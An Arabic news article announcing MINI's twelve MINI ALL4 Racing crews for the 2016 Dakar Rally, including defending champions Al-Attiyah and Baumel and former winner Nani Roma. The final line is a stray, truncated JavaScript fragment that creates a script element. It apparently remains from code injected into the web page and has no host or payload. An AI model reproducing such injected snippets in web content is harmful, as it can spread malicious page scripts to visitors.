ميني تعلن تشكيلة السائقين الدوليين لطواقمRacing MINI ALL4 المشاركين في رالي داكار 2016

ميني تشارك في المنافسة للسنة الخامسة على التوالي في رالي دكار مع 12 أطقم لسيارات MINI ALL4 Racing.

رالي دكار هو السباق والمنافسة الاصعب للسيارات على وجه الأرض حيث يجري على أراضٍ شديدة الوعورة ويمكن إعتباره سباق السباقات التي تجري عبر البلدان. على الرغم من سمعته المرعبة، حققت ميني مع سيارات MINI ALL4 Racing أربعة (2012-2015) انتصارات متتالية في رالي داكار وتتطلع الآن إلى الحصول على الفوز الخامس في المنافسة في عام 2016. وقد بدأت مزايدة ميني لضمان رالي داكار 2016 بالفعل مع إعلان تشكيلة الانطلاق  لأطقم السائقين ال 12 لسيارات MINI ALL4 Racing.

فريق X-raid في رالي داكار سوف يتكون من أربعة أطقم MINI ALL4 Racing. وتتكون هذه الأطقم من السائقين الملاحين والسائقين المساعدين المهنيين وذوي المهارات العالية.

ناصر العطية (قطر) والسائق المساعد لفترة طويلة ماثيو بوميل (فرنسا) هما حاملا لقب بطولة داكار والمدافعان عن اللقب بعد أن صعدا إلى المنصة الأعلى في نهاية رالي داكار 2015.

النجم الاسباني خوان “ناني” روما هو فائز سابق في رالي داكار في كل من فئتي السيارات والدراجات النارية. جنبا إلى جنب مع مواطنه اليكس هارو، يتمتعان بتجربة غنية وهائلة فيما يتعلق برالي داكار. وحتى مع ذلك، روما حريص أكثر من أي وقت مضى على السعي للفوز.

أطقم MINI ALL4 Racing الثمانية المتبقية هي من كل ركن من أركان المعمورة. من أوروبا إلى أمريكا الجنوبية إلى الصين، وحيث يتم بشكل إجمالي تمثيل 13 دولة في طواقم MINI ALL4 Racing المجتمعة.

var d=document;var s=d.createElement(‘script’);